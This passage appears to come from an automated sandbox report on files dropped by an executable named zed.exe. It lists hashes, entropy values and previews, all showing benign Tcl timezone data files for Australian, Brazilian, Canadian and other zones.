                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8341
                                                                                                                                                                                                                                            Entropy (8bit):3.8532171550973526
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:Yyigkp2EUyn8/dnQiAmcO38EJ8i/V9cYgCqMEjKeIZ3wQb25Ly04:Yy3VnQiAmcOM6e0pj
                                                                                                                                                                                                                                            MD5:40D06B80A4A0DB415270EFD9698B97BF
                                                                                                                                                                                                                                            SHA1:1999F0E8C7EBAA11BD21D64D9E07FA911F13C64C
                                                                                                                                                                                                                                            SHA-256:F21B9EA51C0D41BAD0420FE0601E5A4B491FB895856F4BDDF6541D704469D92F
                                                                                                                                                                                                                                            SHA-512:E47D597CC85D177CF2804C44C216EB4C5B74472457F15F697704311A847BF8A051DCAFD26FA61DD689555F35640151E26F25D5DC5319EFEFEA62AD86657A4A95
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Australia/Melbourne) {.. {-9223372036854775808 34792 0 LMT}.. {-2364111592 36000 0 AEST}.. {-1672560000 39600 1 AEDT}.. {-1665388800 36000 0 AEST}.. {-883641600 39600 1 AEDT}.. {-876124800 36000 0 AEST}.. {-860400000 39600 1 AEDT}.. {-844675200 36000 0 AEST}.. {-828345600 39600 1 AEDT}.. {-813225600 36000 0 AEST}.. {31500000 36000 0 AEST}.. {57686400 39600 1 AEDT}.. {67968000 36000 0 AEST}.. {89136000 39600 1 AEDT}.. {100022400 36000 0 AEST}.. {120585600 39600 1 AEDT}.. {131472000 36000 0 AEST}.. {152035200 39600 1 AEDT}.. {162921600 36000 0 AEST}.. {183484800 39600 1 AEDT}.. {194976000 36000 0 AEST}.. {215539200 39600 1 AEDT}.. {226425600 36000 0 AEST}.. {246988800 39600 1 AEDT}.. {257875200 36000 0 AEST}.. {278438400 39600 1 AEDT}.. {289324800 36000 0 AEST}.. {309888000 39600 1 AEDT}.. {320774400 36000 0 AEST}.. {341337600 39600 1 AEDT}.
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):190
                                                                                                                                                                                                                                            Entropy (8bit):4.893713405897538
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq/xJjLkXHAIgoXjLyFvHRL/2QWCCjREeQWCCjLBn:SlSWB9vsM3yI9kHAIgmON/2DC5eDCyB
                                                                                                                                                                                                                                            MD5:80B7CDD1EA5A5308CE84C038180005F2
                                                                                                                                                                                                                                            SHA1:B7CA15B58ADA8CA3EB74B7971073022D57D8EE70
                                                                                                                                                                                                                                            SHA-256:73D7C9E207E61ACF8DF7242BDCD84488189033E22A84873A953B65DE02FA1B0B
                                                                                                                                                                                                                                            SHA-512:F627F5FF335600AC9158D6A0D3694AB7E70180177449C17B5605BBF7B1B7F8FB447A9C207F4E1BCB627074DB47B8A66F5D78E03C6DB8FA17F8BDD6AABB331665
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Australia/Sydney)]} {.. LoadTimeZoneFile Australia/Sydney..}..set TZData(:Australia/NSW) $TZData(:Australia/Sydney)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):192
                                                                                                                                                                                                                                            Entropy (8bit):4.830368875485429
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq/xJjbvvXHAIgoXjbBvRL/2QWCCjsrQWCCjbi:SlSWB9vsM3yIFHAIg2N/2DCZrDCl
                                                                                                                                                                                                                                            MD5:14CB7EA1C028F457345EBEB8ADDC9237
                                                                                                                                                                                                                                            SHA1:208BF676F56533BA271D1B98363A766DF17CF6F2
                                                                                                                                                                                                                                            SHA-256:A983C9CAD7E542CAED43B083E68CD2B782959A4B54015F374C29250D3ACF9B8D
                                                                                                                                                                                                                                            SHA-512:099F65E5FA705FD7257CF7B8E103905EE313C6D082844F69CCD3F318E3E7F4098B29F952FA0AA28655E1FE290A0FB2E809911088315889DE7CAAF0E04698C2FC
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Australia/Darwin)]} {.. LoadTimeZoneFile Australia/Darwin..}..set TZData(:Australia/North) $TZData(:Australia/Darwin)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):739
                                                                                                                                                                                                                                            Entropy (8bit):4.31793586514766
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:MB8623mdHCBdCvmlXz6zezzOz4iaLYvzkzi4zm5fVcBhg8mfev:53eCB0v4+e3Oz4iaLYbkzi4zxhfqw
                                                                                                                                                                                                                                            MD5:01B1A88867472AD60B8F5C0E1648E3ED
                                                                                                                                                                                                                                            SHA1:9975EA750458E8061DD8A83585675CB7E4910CA6
                                                                                                                                                                                                                                            SHA-256:FC1B54CA261074E47A8A486FEAC12DD04D46166D1D2B44163BD8791BEC32D275
                                                                                                                                                                                                                                            SHA-512:20BDFBCD1A5038C81552EBD955F3921DE3447A1F30E64935937768B2B98735AE53049601DCDD2D519646C78E6D03289EB465CFF4F2DADEA7D89A329504C6C475
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Australia/Perth) {.. {-9223372036854775808 27804 0 LMT}.. {-2337925404 28800 0 AWST}.. {-1672552800 32400 1 AWDT}.. {-1665381600 28800 0 AWST}.. {-883634400 32400 1 AWDT}.. {-876117600 28800 0 AWST}.. {-860392800 32400 1 AWDT}.. {-844668000 28800 0 AWST}.. {-836470800 32400 0 AWST}.. {152042400 32400 1 AWDT}.. {162928800 28800 0 AWST}.. {436298400 32400 1 AWDT}.. {447184800 28800 0 AWST}.. {690314400 32400 1 AWDT}.. {699386400 28800 0 AWST}.. {1165082400 32400 1 AWDT}.. {1174759200 28800 0 AWST}.. {1193508000 32400 1 AWDT}.. {1206813600 28800 0 AWST}.. {1224957600 32400 1 AWDT}.. {1238263200 28800 0 AWST}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):203
                                                                                                                                                                                                                                            Entropy (8bit):4.803539644461131
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3yIaWhSHAIgPWAvN/2DCoRWJvFBx+DC7WN:MByMjL9t2rOvFel
                                                                                                                                                                                                                                            MD5:401B6B2E30EF17BE20212645287EB94B
                                                                                                                                                                                                                                            SHA1:67D15A45C61122CE680B829FE0FA3A1C501A8C8F
                                                                                                                                                                                                                                            SHA-256:DDA669B9BFB3E08FC23CE67030148B9E4740824ADD8DE02580D6AFD31CE05BAB
                                                                                                                                                                                                                                            SHA-512:F4348F8F4FF261C47854725AEE4E14E7E334B3C31496E5C46B0E0041551CB6861380E684E8888AFE9DA7E8E97236AC322B9CE2738EF245E9D46C9681665F83A1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Australia/Brisbane)]} {.. LoadTimeZoneFile Australia/Brisbane..}..set TZData(:Australia/Queensland) $TZData(:Australia/Brisbane)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):198
                                                                                                                                                                                                                                            Entropy (8bit):4.752918480727309
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3yIDRpGSHAIgSRrN/2DCa7QDCuRpyn:MByMjdpQYrt23QHpy
                                                                                                                                                                                                                                            MD5:D226A0718185854DFE549E00856AA8D5
                                                                                                                                                                                                                                            SHA1:94EE96FAE259D90C2FDF169DD95BD82B3171FFAE
                                                                                                                                                                                                                                            SHA-256:D9DCFDC377901EC0C0FEB9CEA743C2C1425273F69A1BAA7BF3B74FEC5885B267
                                                                                                                                                                                                                                            SHA-512:7EE29A7235CAAEF4889246B7A2241CA9A0D5D2B2E1D56B20141247C93B8736F17280F0D46004AC4588E137D1E76F661C779C906BBFC2B5F8FA73C19F7657F952
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Australia/Adelaide)]} {.. LoadTimeZoneFile Australia/Adelaide..}..set TZData(:Australia/South) $TZData(:Australia/Adelaide)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8338
                                                                                                                                                                                                                                            Entropy (8bit):3.847525715050911
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:AZJigk42/yn8/dnQiAmcO38EJ8i/V9cYgCqMEjKeIZ3wQb25Ly04:AZJuVnQiAmcOM6e0pj
                                                                                                                                                                                                                                            MD5:C0F1776E011C4C86B7709A592E7CA1EB
                                                                                                                                                                                                                                            SHA1:1CA528D529BF4995E145D6E0D87A8752A3577E7F
                                                                                                                                                                                                                                            SHA-256:FC453486325ADE1D31F14087B76D4936F3A6D551ABD1DB6FCAC129BDB043951C
                                                                                                                                                                                                                                            SHA-512:F872182962C2615A35F012ECAB30C88F07C6BEF0261207AD52706DB22D8CDD0DA65723CD801FDA7C548C5EB0ECFC39DD66CC17503BAA3BBB77BFA35D20650E4F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Australia/Sydney) {.. {-9223372036854775808 36292 0 LMT}.. {-2364113092 36000 0 AEST}.. {-1672560000 39600 1 AEDT}.. {-1665388800 36000 0 AEST}.. {-883641600 39600 1 AEDT}.. {-876124800 36000 0 AEST}.. {-860400000 39600 1 AEDT}.. {-844675200 36000 0 AEST}.. {-828345600 39600 1 AEDT}.. {-813225600 36000 0 AEST}.. {31500000 36000 0 AEST}.. {57686400 39600 1 AEDT}.. {67968000 36000 0 AEST}.. {89136000 39600 1 AEDT}.. {100022400 36000 0 AEST}.. {120585600 39600 1 AEDT}.. {131472000 36000 0 AEST}.. {152035200 39600 1 AEDT}.. {162921600 36000 0 AEST}.. {183484800 39600 1 AEDT}.. {194976000 36000 0 AEST}.. {215539200 39600 1 AEDT}.. {226425600 36000 0 AEST}.. {246988800 39600 1 AEDT}.. {257875200 36000 0 AEST}.. {278438400 39600 1 AEDT}.. {289324800 36000 0 AEST}.. {309888000 39600 1 AEDT}.. {320774400 36000 0 AEST}.. {341337600 39600 1 AEDT}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):195
                                                                                                                                                                                                                                            Entropy (8bit):4.777331394201868
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3yI4DVJHAIgxnvVWAN/2DC3neDCVDy:MByMjUQVv8At2+eKy
                                                                                                                                                                                                                                            MD5:9C58D9EFBB03472BBDA76CE2FFAD4BB4
                                                                                                                                                                                                                                            SHA1:30959E3681B64AE26F7FA3957887896C26AF7F19
                                                                                                                                                                                                                                            SHA-256:C94FA7A7640CD00963EE8FF1A3D9DCDA2075408739D998EDBF7CFC998DB764FD
                                                                                                                                                                                                                                            SHA-512:2D6B778217726691F2CB4A4995A8B1AB08DDB7FE4570A3FD04EF54F718F455EF3CBD4EEF1A1BCC99A2088C82A6E89DB455BAF1327CECD6BF608837E50F14A6C1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Australia/Hobart)]} {.. LoadTimeZoneFile Australia/Hobart..}..set TZData(:Australia/Tasmania) $TZData(:Australia/Hobart)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):204
                                                                                                                                                                                                                                            Entropy (8bit):4.818875198673406
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3yIvFfkSHAIgoFNNvN/2DCzyQDCMF4:MByMj9fKaNNvt2xQz4
                                                                                                                                                                                                                                            MD5:0B144A2E47C81354BC510BC741DE5150
                                                                                                                                                                                                                                            SHA1:A7396F1741F02C6C208FD1286362E4E0720198B8
                                                                                                                                                                                                                                            SHA-256:DBEF9C5BDD290FEC5FA740D697143332D3CA1FC373CF1DF736F1883AC9BA3298
                                                                                                                                                                                                                                            SHA-512:562B029591F9ADB8C324BA56E849B2B524E91B26D3DB441510194882A8E1E63E6948D041874A00A0A76F29925A1CEAC53DD2AE5D7F23123B6FE919346CBFD8CC
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Australia/Melbourne)]} {.. LoadTimeZoneFile Australia/Melbourne..}..set TZData(:Australia/Victoria) $TZData(:Australia/Melbourne)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):188
                                                                                                                                                                                                                                            Entropy (8bit):4.831654343064909
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq/xJjXFeyXHAIgoXjrWARL/2QWCCjH0QWCCjQ:SlSWB9vsM3yInHAIgOWAN/2DC00DCt
                                                                                                                                                                                                                                            MD5:5F5916CB038876BE27AA5E2AD74EE085
                                                                                                                                                                                                                                            SHA1:18AC21B638188B542455BA3DA91F958DF1724E68
                                                                                                                                                                                                                                            SHA-256:75ABB7F20C4A0B618138AA190AF33CEAF2A6D2C707DA6C1314E4BFF2F9904F58
                                                                                                                                                                                                                                            SHA-512:ADFD83E292AC1BB5E19255A9B2DA0E3BB9323A5F9B92D458DE34C291D7F9B6CFBBF62AA3351FB320E54F34305DD485ADC72134D21AFA6A27B2B8B7D93DCA2113
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Australia/Perth)]} {.. LoadTimeZoneFile Australia/Perth..}..set TZData(:Australia/West) $TZData(:Australia/Perth)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):212
                                                                                                                                                                                                                                            Entropy (8bit):4.918079927018121
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3yIcKlHAIgJK3N/2DCkuM0DC9KM:MByMjcKeJK3t2kVSKM
                                                                                                                                                                                                                                            MD5:BEDEA56FCE4B2F0A3F3E9319856A5560
                                                                                                                                                                                                                                            SHA1:9FD0FE998A003C6B4CCCD00A977153347DE07F55
                                                                                                                                                                                                                                            SHA-256:55A9264D0414644A1BE342106AE86086A6659596DC9322A74FC4D1DDB41F7C60
                                                                                                                                                                                                                                            SHA-512:7C438B72262B99EDEEB31AC95E0135BB722A3B0B049278B6DE67DB5FB501837FB9C03785233B538E83F4B56104F6EA3B3DA0F7C2275E0F78F232161840AA4C63
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Australia/Broken_Hill)]} {.. LoadTimeZoneFile Australia/Broken_Hill..}..set TZData(:Australia/Yancowinna) $TZData(:Australia/Broken_Hill)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):194
                                                                                                                                                                                                                                            Entropy (8bit):4.888429541699473
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y7thteSHAIgpth9RN/xWh490th4:MByMYdIp7tQ490I
                                                                                                                                                                                                                                            MD5:A8A7A10DA4321819ED71F891480770F8
                                                                                                                                                                                                                                            SHA1:930674EF7711542D7F471A59C1870D4576E027FD
                                                                                                                                                                                                                                            SHA-256:2F594239A434052D36053A2B3EAB134EADBAD06EB6737E67CF72166DAB157537
                                                                                                                                                                                                                                            SHA-512:C6AD1869A713DDE0E4DE53F7894E5CE0B7AEFDDD7C5C3D83BB5B92FB7D8E20B373A6694045053E1AE8EA98A7B7D0C052EF2C21310E47DC650A7A399A5F73D586
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Rio_Branco)]} {.. LoadTimeZoneFile America/Rio_Branco..}..set TZData(:Brazil/Acre) $TZData(:America/Rio_Branco)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):190
                                                                                                                                                                                                                                            Entropy (8bit):4.875339623736144
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0wKy4oeyXHAIg20wKARL/1bIAJl0IAcGEwKyovn:SlSWB9vsM3y7/rDSHAIgp/AN/xIAE90j
                                                                                                                                                                                                                                            MD5:E0D0EFBEC37E27532B49FF6DD9893DA0
                                                                                                                                                                                                                                            SHA1:9C00993A885AF448E48201A46E17629A7A602FC6
                                                                                                                                                                                                                                            SHA-256:A676562A90FF8587A775F6F0E3BE05D870456A56D25B5330816BF9043C8D475B
                                                                                                                                                                                                                                            SHA-512:AB0E6907F9C0002CA5C050A0069AF013B14BADA08CA4553C96B302C078DF7629D5D7EDE4A19A53DEC6E7B9E6D9857F14EC7A1DB9BC11F2EEC9FFBAC70E129EEE
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Noronha)]} {.. LoadTimeZoneFile America/Noronha..}..set TZData(:Brazil/DeNoronha) $TZData(:America/Noronha)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):191
                                                                                                                                                                                                                                            Entropy (8bit):4.948480276987682
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0tQJXveyXHAIg20tQJE6RL/1bJHIAcGEtQJXy:SlSWB9vsM3y7tIGSHAIgpt36N/xR90tF
                                                                                                                                                                                                                                            MD5:FCCB5F44903E1B988A058E5BBF5E163B
                                                                                                                                                                                                                                            SHA1:E1CC03DD4A804C7305D8B0C12D8451D08AE262EA
                                                                                                                                                                                                                                            SHA-256:961FB3AB99A63B1E9704B737EAB2D588B5A39D253A213E175CC678BEDFFD498D
                                                                                                                                                                                                                                            SHA-512:F31C80E4AD6EBE6CB8A3382E0052DC47601D073E8F81375D50241105675AA3AB45433FFD0534524D9992ABE1086C6671D85FF7C72B0D6766EB9984426F608B77
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Sao_Paulo)]} {.. LoadTimeZoneFile America/Sao_Paulo..}..set TZData(:Brazil/East) $TZData(:America/Sao_Paulo)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):182
                                                                                                                                                                                                                                            Entropy (8bit):4.902113962502196
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0znQZF3vXHAIg20znQv5RL/1bbAWVIAcGEznQe:SlSWB9vsM3y7zn+PHAIgpznSN/xn90zN
                                                                                                                                                                                                                                            MD5:9F4B43F4F27D0B7EAC0C5401A1A794B4
                                                                                                                                                                                                                                            SHA1:2A8543B994E93E54BD50EAA78463905E6A8EBE74
                                                                                                                                                                                                                                            SHA-256:0500C9A248C8CE9030EA30D0AF9DD95DC465480BAF60646C0B7C511FA23C6D1F
                                                                                                                                                                                                                                            SHA-512:0ADAF708ACFBD80F4704951EEBC24AD144FD5856997A429279E804F3A7F7F9A8FED41DCEE85BFB1ECDBF1E05137E87E7430186474BCF5DE42067FFC74746F048
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Manaus)]} {.. LoadTimeZoneFile America/Manaus..}..set TZData(:Brazil/West) $TZData(:America/Manaus)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7736
                                                                                                                                                                                                                                            Entropy (8bit):3.7984816540097843
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:09+xKDBb0S274elPiIEtzsFpMbFNBwA3ybuNTjrjBDmE0DmiTcoYdNOMCsyZhlt7:9Ss41sFpM5vwA6Efv03TBZLl
                                                                                                                                                                                                                                            MD5:6DB983AD72FB2A88FC557BE5E873336F
                                                                                                                                                                                                                                            SHA1:C64E988010087ED559A990B3D95078949C9B4D72
                                                                                                                                                                                                                                            SHA-256:E2AEA7CFD428A43D9DB938BCC476623ADC1250BD8057013A7FFF5F89D7FF8EFC
                                                                                                                                                                                                                                            SHA-512:C0A646F80FB2FD42D9146A4FD36CF5A7F62016684F8D5AF80453EC190F4AEA65EDADC5BCF071AE746ABFB43B29C27B2743F2152B6986D41BFDE1617CA774A7C5
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:CET) {.. {-9223372036854775808 3600 0 CET}.. {-1693706400 7200 1 CEST}.. {-1680483600 3600 0 CET}.. {-1663455600 7200 1 CEST}.. {-1650150000 3600 0 CET}.. {-1632006000 7200 1 CEST}.. {-1618700400 3600 0 CET}.. {-938905200 7200 1 CEST}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-828226800 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-796777200 3600 0 CET}.. {-781052400 7200 1 CEST}.. {-766623600 3600 0 CET}.. {228877200 7200 1 CEST}.. {243997200 3600 0 CET}.. {260326800 7200 1 CEST}.. {276051600 3600 0 CET}.. {291776400 7200 1 CEST}.. {307501200 3600 0 CET}.. {323830800 7200 1 CEST}.. {338950800 3600 0 CET}.. {354675600 7200 1 CEST}.. {370400400 3600 0 CET}.. {386125200 7200 1 CEST}.. {401850000 3600 0 CET}.. {417574800 7200 1 CEST}.. {433299600 3600 0 CET}.. {449024400 7200 1 CEST}.. {465354000 3600 0 CET}.. {481078800 7200
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8505
                                                                                                                                                                                                                                            Entropy (8bit):3.8095769056779916
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:e3HgahLi8hbZlNA604qSScBgN+4ctDzIVQ/c/3hNxTh:eQaUqtfA604qSBgI7DBch
                                                                                                                                                                                                                                            MD5:A6F88C55E8613A27DE3E6C25B0672910
                                                                                                                                                                                                                                            SHA1:3B593CC17BF153A6209FC5AACE7B88DA9603BD44
                                                                                                                                                                                                                                            SHA-256:73A9841F233AA657AFB6CED8A86A37D55FE5582DD996B9B28975D218BCCC078F
                                                                                                                                                                                                                                            SHA-512:526A922B1594A2800B03F363F7BFEC29203D4A4F2B49C5F2618469F59176CE4F8AFBA0616B226AC39D308DB05DE7147714D9B6CDBB2EA7373A041A4D47F50E2E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:CST6CDT) {.. {-9223372036854775808 -21600 0 CST}.. {-1633276800 -18000 1 CDT}.. {-1615136400 -21600 0 CST}.. {-1601827200 -18000 1 CDT}.. {-1583686800 -21600 0 CST}.. {-880214400 -18000 1 CWT}.. {-769395600 -18000 1 CPT}.. {-765392400 -21600 0 CST}.. {-84384000 -18000 1 CDT}.. {-68662800 -21600 0 CST}.. {-52934400 -18000 1 CDT}.. {-37213200 -21600 0 CST}.. {-21484800 -18000 1 CDT}.. {-5763600 -21600 0 CST}.. {9964800 -18000 1 CDT}.. {25686000 -21600 0 CST}.. {41414400 -18000 1 CDT}.. {57740400 -21600 0 CST}.. {73468800 -18000 1 CDT}.. {89190000 -21600 0 CST}.. {104918400 -18000 1 CDT}.. {120639600 -21600 0 CST}.. {126691200 -18000 1 CDT}.. {152089200 -21600 0 CST}.. {162374400 -18000 1 CDT}.. {183538800 -21600 0 CST}.. {199267200 -18000 1 CDT}.. {215593200 -21600 0 CST}.. {230716800 -18000 1 CDT}.. {247042800 -21600 0 CST}.. {262771200
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):189
                                                                                                                                                                                                                                            Entropy (8bit):4.804821796604604
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx02NEO/vXHAIg202NEqA6RL/0nalGe2IAcGE2NEOyn:SlSWB9vsM3y7UEOXHAIgpUEqA6N/0af9
                                                                                                                                                                                                                                            MD5:33A04963E70EBF29339204348E0DF874
                                                                                                                                                                                                                                            SHA1:456C0DB88ECE4D180EEE5AE5AEF5FBEB6E977D00
                                                                                                                                                                                                                                            SHA-256:6DC6354D761CBE7820C9186568CAB87AD48CA925507F6A740357195B60E16D87
                                                                                                                                                                                                                                            SHA-512:DF8F46827760BD7EC922C6837E0B6649B4FBD220B79E6F1B67FE3DD8CB3D2D035ECDAF4CF6CE5BDE6DC79C6F7B6EE2B9787AF08A97845CD0D647720A2E78D7EF
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Halifax)]} {.. LoadTimeZoneFile America/Halifax..}..set TZData(:Canada/Atlantic) $TZData(:America/Halifax)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):191
                                                                                                                                                                                                                                            Entropy (8bit):4.863241040396457
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0po/vXHAIg20puFvHRL/0nPQox/h4IAcGEpoyn:SlSWB9vsM3y7pYHAIgppuRN/0d490pl
                                                                                                                                                                                                                                            MD5:97E50CE9FBA3F1A6DFCF333F9E6D592C
                                                                                                                                                                                                                                            SHA1:EE472C411079E788DBF32FAC9C5B7EE121960DC2
                                                                                                                                                                                                                                            SHA-256:DB32E83949D62478D229E9FB57BB1624D21B3A9CCEE4CD55335F8262C01D820A
